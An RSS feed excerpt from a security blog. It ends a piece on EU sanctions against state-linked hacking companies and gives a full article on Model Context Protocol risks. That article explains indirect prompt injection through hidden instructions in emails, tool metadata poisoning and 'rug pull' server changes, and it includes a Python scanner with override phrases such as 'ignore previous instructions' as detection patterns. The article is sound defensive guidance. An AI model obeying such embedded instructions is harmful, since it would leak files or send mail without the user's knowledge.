Running operations through quasi-private institutions provides nation-states with plausible deniability. Crystal Morin, senior cybersecurity strategist at Sysdig, explains that maintaining a legitimate commercial offering complicates law enforcement efforts to distinguish standard business practices from unauthorized behavior.

Corporate structures also provide access to resources that might be restricted for state entities. Operating as a company simplifies talent recruitment. It also allows groups to purchase infrastructure and tools through the global supply chain using legitimate tax IDs and credentials. Furthermore, privatized workforces generally operate with fewer bureaucratic constraints than direct government agencies.

## Evaluating the impact of sanctions

The recent sanctions stem from regulatory frameworks developed over several years. Following a series of severe global security incidents in the mid-2010s, including the WannaCry and NotPetya malware events, the European Council established a "Cyber Diplomacy Toolbox" in June 2017. This framework outlined diplomatic and regulatory responses to infrastructure threats. The council formalized the specific mechanics of these sanctions in May 2019 and has since applied them to seven entities and 19 individuals.

For publicly traded organizations like Integrity Technology Group, sanctions carry tangible business consequences. Legitimate partners and customers typically sever ties to avoid regulatory penalties, which restricts the organization's access to funding, infrastructure, and global supply chains. While these measures do not completely neutralize a threat group's operations, they force operators out of standard commercial environments and affect their reputation.

For organizations functioning primarily as front companies, such as iSoon, the direct commercial impact is less severe. However, the restrictions still impose personal consequences on leadership, limiting their international mobility and freezing any assets held in cooperating jurisdictions.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
    <item>
        <title>Addressing architectural security risks in Model Context Protocol integrations</title>
        <link>https://security.shortwaves.live/blog/2e17a619-a8d5-45fa-8b9b-68eba0d37441</link>
        <guid isPermaLink="true">https://security.shortwaves.live/blog/2e17a619-a8d5-45fa-8b9b-68eba0d37441</guid>
        <pubDate>Sat, 21 Mar 2026 03:17:49 GMT</pubDate>
        <description>The integration of the Model Context Protocol (MCP) shifts large language models from text generators to autonomous execution engines, introducing distinct architectural risks. Organizations adopting MCP must implement structural defenses, such as behavioral baselines and strict access controls, to protect enterprise data from unauthorized instructions.</description>
        <content:encoded><![CDATA[
            Organizations rushing to connect large language models (LLMs) to external data sources and services using the Model Context Protocol (MCP) are inadvertently expanding their exposure areas in ways that traditional security controls are not designed to manage.

Because these risks stem from the foundational architecture of both LLMs and MCP, security teams cannot resolve them through standard patching or basic configuration changes. Gianpietro Cutolo, a cloud threat researcher at Netskope, is scheduled to detail these findings during a session at the RSAC 2026 Conference in San Francisco, emphasizing the need for structural safeguards.

## Core architectural challenges

The primary issue lies in how an LLM's operational behavior changes when integrated with MCP. In a standard deployment, an LLM receives a prompt and generates a text response for a user to review. Historically, the primary security risk in this dynamic was an inaccurate or hallucinated response.

MCP fundamentally alters this paradigm. Instead of merely generating text, the LLM executes actions on behalf of the user. In an MCP-enabled environment, an LLM can autonomously access enterprise data, trigger workflows, and interact with APIs.

For example, a user might ask an AI assistant, such as Claude or ChatGPT, to schedule a meeting. The model can use an MCP connector for Google Calendar to check availability, create the event, and set a reminder without manual intervention. The model itself selects which published functions to use—such as fetching emails, creating calendar events, or searching local files—and determines the exact parameters for those actions. While MCP connectors allow organizations to extend the utility of their AI services, this execution capability introduces new security requirements.

One foundational challenge is that LLMs process content and instructions through the same context window. When an MCP connector retrieves content from an external source, such as a document or email, the LLM evaluates the entire payload as input. This creates an opening for an unauthorized party to embed hidden instructions within otherwise legitimate content.

If a threat actor sends an email containing both standard text and hidden instructions, and the user asks their AI assistant to summarize that email, the MCP connector injects the entire message into the LLM's context. Unable to separate the data from the directive, the LLM may execute the hidden instruction. This could result in the model exporting local files or sending emails without the user's knowledge. The impact of this process, known as indirect prompt injection, scales significantly in environments where a single agent maintains active MCP connections to local drives, Jira tickets, and cloud storage. A single email containing unauthorized instructions could initiate coordinated actions across all connected services simultaneously.

A second risk category involves tool metadata manipulation, sometimes referred to as tool poisoning. When an LLM connects to an MCP server, it requests a list of supported tools, including their names and input requirements. This metadata feeds directly into the LLM context window. An unauthorized party can embed unsafe instructions within this tool metadata, which the LLM will again process as functional directives.

A third risk, categorized by Cutolo as a "Rug Pull," occurs when an MCP server undergoes an unauthorized modification. The current protocol lacks a native mechanism to notify an MCP client or AI agent when a server's underlying logic changes. If an established MCP server is altered via a modified update, it can begin serving unsafe tool descriptions that direct the AI agent to take unintended actions, with the client having no immediate visibility into the alteration.

## Developing an architectural defense

Because these behaviors are inherent to how LLMs and MCP operate, organizations must implement defense-in-depth strategies rather than relying on software patches.

To mitigate indirect prompt injection, organizations should physically or logically separate MCP servers that handle public data from those with access to private enterprise information. Security teams should implement scanning mechanisms to detect instruction-like patterns, hidden text, and unusual formatting within any context the agent might process. Additionally, maintaining strict human-in-the-loop requirements for all sensitive actions ensures that critical operations are explicitly authorized.
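
Such a scanning mechanism can start as simple pattern matching over retrieved content. The sketch below is a minimal heuristic (the pattern list is an illustrative assumption, not a complete defense) for flagging instruction-like content before it reaches the model's context window:

```python
import re

# Heuristic patterns suggesting embedded instructions rather than data;
# a real deployment would layer classifier-based detection on top.
SUSPICIOUS_PATTERNS = [
    re.compile(r"ignore (all |any )?(previous|prior) instructions", re.I),
    re.compile(r"you are now", re.I),
    re.compile(r"(send|forward|upload|export) .* (file|credential|email)", re.I),
    re.compile(r"<!--.*?-->", re.S),            # hidden HTML comments
    re.compile(r"[\u200b\u200c\u200d\u2060]"),  # zero-width characters
]

def flag_retrieved_content(text):
    """Return the patterns matched by content an MCP connector retrieved."""
    return [p.pattern for p in SUSPICIOUS_PATTERNS if p.search(text)]
```

A connector gateway could quarantine any payload with a non-empty result for human review instead of injecting it into the agent's context.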

For broader environmental protection, organizations should maintain a comprehensive inventory of every MCP server and rigorously enforce least-privilege permissions, ensuring each connector can only access the specific resources required for its function. Logging all MCP traffic and establishing behavioral baselines will allow security teams to detect when an AI agent's activity deviates from expected patterns. Finally, to defend against metadata manipulation, security teams should systematically scan all tool metadata for unauthorized instructions before approving the installation of any MCP server.
        ]]></content:encoded>
        <author>Triage Security Media Team</author>
    </item>
</channel>
</rss>